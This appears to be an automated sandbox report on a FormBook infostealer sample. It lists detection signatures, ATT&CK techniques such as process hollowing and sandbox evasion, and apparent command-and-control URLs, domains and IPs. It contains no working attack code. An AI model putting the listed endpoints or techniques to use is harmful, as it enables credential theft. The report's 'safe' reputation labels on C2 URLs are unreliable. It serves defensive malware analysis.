          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 438543 Sample: PQMW0W5h3X.exe Startdate: 22/06/2021 Architecture: WINDOWS Score: 100 29 www.wideawakemomma.com 2->29 31 wideawakemomma.com 2->31 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 7 other signatures 2->55 9 PQMW0W5h3X.exe 19 2->9         started        13 explorer.exe 2->13         started        signatures3 process4 dnsIp5 25 C:\Users\user\AppData\Local\...\System.dll, PE32 9->25 dropped 27 C:\Users\user\AppData\...\axjnwhbrvqsxuek, DOS 9->27 dropped 57 Detected unpacking (changes PE section rights) 9->57 59 Maps a DLL or memory area into another process 9->59 61 Tries to detect virtualization through RDTSC time measurements 9->61 16 PQMW0W5h3X.exe 9->16         started        33 doityourselfism.com 169.62.77.158, 49761, 80 SOFTLAYERUS United States 13->33 35 www.ivoirepneus.com 213.186.33.5, 49758, 80 OVHFR France 13->35 37 17 other IPs or domains 13->37 63 System process connects to network (likely due to code injection or exploit) 13->63 19 rundll32.exe 13->19         started        file6 signatures7 process8 signatures9 39 Modifies the context of a thread in another process (thread injection) 16->39 41 Maps a DLL or memory area into another process 16->41 43 Sample uses process hollowing technique 16->43 45 Queues an APC in another process (thread injection) 16->45 47 Tries to detect virtualization through RDTSC time measurements 19->47 21 cmd.exe 1 19->21         started        process10 process11 23 conhost.exe 21->23         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PQMW0W5h3X.exe17%VirustotalBrowse
          PQMW0W5h3X.exe22%ReversingLabs
          PQMW0W5h3X.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.PQMW0W5h3X.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.PQMW0W5h3X.exe.22c0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.rundll32.exe.4d4be0.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.0.PQMW0W5h3X.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          2.1.PQMW0W5h3X.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.rundll32.exe.4ac7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.PQMW0W5h3X.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          2.2.PQMW0W5h3X.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.guys-only.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY00%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.doityourselfism.com/dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY00%Avira URL Cloudsafe
          http://www.invisiongc.net/dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==0%Avira URL Cloudsafe
          http://www.killrstudio.com/dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY00%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.thenorthgoldline.com/dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w==0%Avira URL Cloudsafe
          http://www.wideawakemomma.com/dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.ivoirepneus.com/dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw==0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.cindywillardrealtor.com/dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg==0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.guys-only.com/dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY00%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.extinctionbrews.com/dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY00%Avira URL Cloudsafe
          http://www.qq66520.com/dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mzyxi-rkah-y.net
          		52.79.124.173
          		truetrue
            		unknown
            www.guys-only.com
            		154.196.232.108
            		truetrueunknown
            www.qq66520.com
            		166.88.88.176
            		truetrue
              		unknown
              extinctionbrews.com
              		34.102.136.180
              		truefalse
                		unknown
                wideawakemomma.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.ivoirepneus.com
                  		213.186.33.5
                  		truetrue
                    		unknown
                    invisiongc.net
                    		34.102.136.180
                    		truefalse
                      		unknown
                      killrstudio.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        www.builtbydawn.com
                        		172.67.129.33
                        		truetrue
                          		unknown
                          cindywillardrealtor.com
                          		34.102.136.180
                          		truefalse
                            		unknown
                            doityourselfism.com
                            		169.62.77.158
                            		truetrue
                              		unknown
                              825610.parkingcrew.net
                              		75.2.81.221
                              		truefalse
                                		high
                                www.killrstudio.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.thenorthgoldline.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.extinctionbrews.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.doityourselfism.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.invisiongc.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.avito-payment.life
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.cindywillardrealtor.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.wideawakemomma.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.saludflv.info
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.doityourselfism.com/dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.invisiongc.net/dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.killrstudio.com/dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.thenorthgoldline.com/dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.wideawakemomma.com/dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw==false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  www.extinctionbrews.com/dy8g/true
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.ivoirepneus.com/dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cindywillardrealtor.com/dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg==false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.guys-only.com/dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.extinctionbrews.com/dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.qq66520.com/dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ==true
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.337441844.000000000095C000.00000004.00000020.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.comexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              		high
                                                              https://zz.bdstatic.com/linksubmit/push.jsrundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.tiro.comexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://nsis.sf.net/NSIS_ErrorErrorPQMW0W5h3X.exefalse
                                                                    		high
                                                                    http://push.zhanzhang.baidu.com/push.jsrundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.goodfont.co.krexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.carterandcone.comlexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.typography.netDexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://fontfabrik.comexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://nsis.sf.net/NSIS_ErrorPQMW0W5h3X.exefalse
                                                                            		high
                                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.fonts.comexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.sandoll.co.krexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.sakkal.comexplorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                213.186.33.5
                                                                                		www.ivoirepneus.comFrance
                                                                                		16276OVHFRtrue
                                                                                172.67.129.33
                                                                                		www.builtbydawn.comUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                166.88.88.176
                                                                                		www.qq66520.comUnited States
                                                                                		18779EGIHOSTINGUStrue
                                                                                154.196.232.108
                                                                                		www.guys-only.comSeychelles
                                                                                		139646HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHKtrue
                                                                                169.62.77.158
                                                                                		doityourselfism.comUnited States
                                                                                		36351SOFTLAYERUStrue
                                                                                34.102.136.180
                                                                                		extinctionbrews.comUnited States
                                                                                		15169GOOGLEUSfalse
                                                                                75.2.81.221
                                                                                		825610.parkingcrew.netUnited States
                                                                                		16509AMAZON-02USfalse
                                                                                52.79.124.173
                                                                                		www.mzyxi-rkah-y.netUnited States
                                                                                		16509AMAZON-02UStrue

                                                                                General Information

                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                Analysis ID:438543
                                                                                Start date:22.06.2021
                                                                                Start time:18:23:16
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 9m 43s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:light
                                                                                Sample file name:PQMW0W5h3X.exe
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:24
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.evad.winEXE@7/3@14/8
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 23.6% (good quality ratio 21.4%)
                                                                                • Quality average: 75.4%
                                                                                • Quality standard deviation: 31.2%
                                                                                HCA Information:
                                                                                • Successful, ratio: 90%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .exe
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                • TCP Packets have been reduced to 100
                                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 168.61.161.212, 104.43.193.48, 13.88.21.125, 13.64.90.137, 20.50.102.62, 20.54.104.15, 20.54.7.98, 51.103.5.159, 40.112.88.60, 173.222.108.210, 173.222.108.226, 80.67.82.235, 80.67.82.211, 20.82.210.154, 23.35.236.56
